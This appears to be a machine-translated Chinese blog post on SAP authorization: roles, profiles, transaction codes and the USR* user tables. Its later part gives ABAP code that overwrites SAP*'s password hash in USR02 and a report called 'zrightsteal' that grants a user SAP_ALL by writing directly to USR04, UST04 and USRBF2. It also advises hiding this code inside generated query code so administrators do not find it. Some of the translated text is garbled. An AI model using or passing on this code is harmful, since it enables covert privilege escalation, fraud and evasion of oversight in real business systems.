SAP 用户权限

通常Basis会使用PFCG进行权限管理，这样当你保存的时候，它会生成一个系统外的权限名称。还记得在SU01 中，用户有配置文件和角色字段吗？他们是什么关系？

首先了解几个概念。 1. Activity 这样说吧。让我们从活动开始。您可以通过查字典来了解活动的含义。是的，这意味着可以采取哪些行动。比如不能抽烟，只能喝酒，不能。 2多两，不行，这是我老婆说的，SAP不是这样的，只能插入，更新，显示等等。当年德国人把这些东西写在tobj表里。活动还可以分为活动组。

2. 活动类别授权组角色Vs Profile 看表T020 就知道了，分别是K、D、A、M 等。

什么是个人资料？其实可以理解为所有授权数据的集合名称（有很多授权组–{可以用OBA7来填写，太详细的权限不是一件好事^_^}和活动），通常一个自定义角色会生成一个配置文件，SAP权限控制是根据配置文件中的授权数据（对象）进行控制的。

什么是角色？角色只是一个名称，然后将配置文件分配给它。例如，如果您创建用户SU01，我没有任何角色，但您可以通过添加SAP_All 配置文件来执行任何操作。 SAP 本身有许多默认的角色配置文件。

3.最常用的PFCG-授权-更改授权数据-输入后，选择选择标准。可以看到所有的授权对象。您可以手动添加授权对象。例如，如果你在使用某个t-code权限时出错，abap使用SU53来检查，你就会知道它丢失了。哪些授权对象可以手动添加？您可以选择授权级别，按账户类型细分权限。有些甚至直接进入表字段。您甚至可以为对象分配缓存缓冲区。

那么SAP是如何实现权限控制的呢？屠夫需要使用小仔。

4. 几个关于权限的t代码。

SAP 用户权限

(1) 角色相关T-code:PFAC 标准PFAC_CHG 更改PFAC_DEL 删除PFAC_DIS 显示PFAC_INS 创建新PFAC_STRPFCG 创建ROLE_CMP 比较SUPC 批量创建角色配置文件SWUJ 测试SU03 检测授权数据SU25、SU26 检查更新配置文件(2) 创建用户相关T-code:SU0 SU01 SU01D SU01_NAV SU05 SU50、Su51、SU52 SU1 SU10 批次SU12 批次SUCOMP: 维护用户公司地址SU2 更改用户参数SUIM 用户信息系统用户组SUGR: 维护SUGRD: 显示SUGRD_NAV: 或维护SUGR_NAV: 或显示(3) 关于profileAuthoraztion DataSU02: 无需角色细分，直接创建配置文件SU20:授权字段

SU21(SU03):****维护授权对象(TOBJ、USR12)。对于凭证，您可以将其细分为：F_BKPF_BED: 会计凭证：客户的账户授权F_BKPF_BEK: 会计凭证：供应商的账户授权F_BKPF_BES: 会计凭证：总账科目的账户授权F_BKPF_BLA: 会计凭证3336 0 单据类型授权F_BKPF_BUK: 会计凭证：公司代码授权F_BKPF_BUP: 会计凭证：过帐期间授权F_BKPF_GSB: 会计Document:业务领域的授权F_BKPF_KOA:会计Document:帐户类型的授权F_BKPF_VW 3 3360会计Document:更改Doc.Type/PsKy的默认值然后你可以细分这些东西，当你输入时它保存在USR12表中。就是DB层的UTAB。

具体交易代码细分为： SU22、SU24 SU53:***。用于检查是否存在授权对象。 SU56: 分析授权数据缓冲区。 SU87:用于检查用户更改生成的历史记录。 SU96、SU97、SU98、SU99: 有什么作用？ SUPC:批量生成角色

数据库和逻辑层：SUKRI:对于安全性至关重要的事务组合表：TOBJ : 所有可用的授权对象。（全部在这里） USR12: 用户级别授权值—————————————-USR01:主数据USR02:密码是这里USR04:授权在这里USR03:用户地址数据USR05:用户主参数IDUSR06:每个用户的附加数据USR07:上次授权检查失败的对象/值USR08:用户菜单条目表USR09:用户菜单（工作区）的条目USR10:用户主授权配置文件USR11:配置文件的用户主文本(USR10)USR12:用户主授权值USR13:简短的文本授权USR14:每个用户的可收费语言版本USR15:外部用户名USR16:用户授权变量的值USR20:上次用户主重组的日期USR21:分配用户名地址密钥USR22:无需内核访问的登录数据USR30:用户菜单的附加信息0:非法密码表USR41:当前用户USREFUS:USRBF2USRBF3UST04:用户配置文件位于此处UST10C: 复合配置文件UST10S: 单一配置文件（UST12 : 对应于角色授权） ….

….如何窃取权限

……………………

User :User type用户类型（用来做什么的我就不说了） :通常的用户类型包括a.dialog（即普通用户）b.communicationc.systemd.servicee.reference。

通常在使用任何T 代码之前必须进行权限检查。 AUTHORITY_CHECK: 这个函数只是一个小检查，看看你的用户是否拥有它以及它何时过期。 ** 如果编码，只需使用此功能。 AUTHORITY_CHECK_TCODE: 检查T 代码

SAP 用户权限

这两个函数实际上检查授权对象。SUSR_USER_AUTH_FOR_OBJ_GET:AUTHORIZATION_DATA_READ_SELOBJ:——————————————————– —- —将SAP*的密码更改为123的程序非常简单。我们找到用户登录表USR02。（DF52478E6FF90EEB是SAP加密的，存储在DB中，有谁研究过SAP的密码加密吗？）report zmodSAP* .data zUSR02 like USR02 .select single * into zUSR02 from USR02where BNAME=’SAP*’ .zUSR02-Bcode=’DF52478E6FF90EEB ‘ .从zUSR02 更新USR02 。

现在的问题是如何防止你的基础被发现。这很简单。隐藏查询中的代码。也就是说，如果你进行查询，查询就会生成一个代码，然后你添加这个代码。谁能想到？然后你就等着你的基础哭吧.

这太残忍了。您应该秘密创建自己的用户。这里的权限结构大家一定很清楚了。权限与三个表相关。 a.USR04b.USR04c.USRBF2 该表对应于所使用的授权对象。*———————————————— ———————** 举报： Steal SAP ALL Right ** 创建日期： 2004.04.01 ** 创建者： Stone.Fu ** 说明：是窃取SAP ALL 权限** 修改日期： 2005.11.02* 说明：在报表绘制器或查询代码中隐藏此代码**———————— – ————————————————*

像USR04 一样报告zrightsteal.data zUSR04 。 ‘?工作区？数据zUST04如USR04.data zPROFS如USR04-PROFS.数据ZUSRBF2如USRBF2出现0与标题行。’USRBF2?内部表** 更新授权表USR04.select single * 从USR04 到zUSR04，其中BNAME=’ZABC2’。 ‘SAP 所有权限将’C SAP_ALL’ 移动到zPROFS .ZUSR04-NRPRO=’14’.zUSR04-PROFS=zPROFS。从zUSR04 更新USR04。

**更新用户授权主表UST04 .select single * 从UST04 到zUST04，其中BNAME=’ZABC2′.zUST04-PROFILE=’SAP_ALL’。 ‘SAP 所有权限从zUST04 更新UST04 。

*?插入*ZUST04-MANDT=’200′.*ZUST04-BNAME=’ZABC2′.*ZUST04-PROFILE=’SAP_ALL’.*从ZUST04 插入UST04 。

select * from USRBF2 into table ZUSRBF2where BNAME=’SAP*’ .Loop at ZUSRBF2.ZUSRBF2-BNAME=’ZABC2’。修改ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.endloop.INSERT USRBF2 FROM TABLE ZUSRBF2 接受重复键。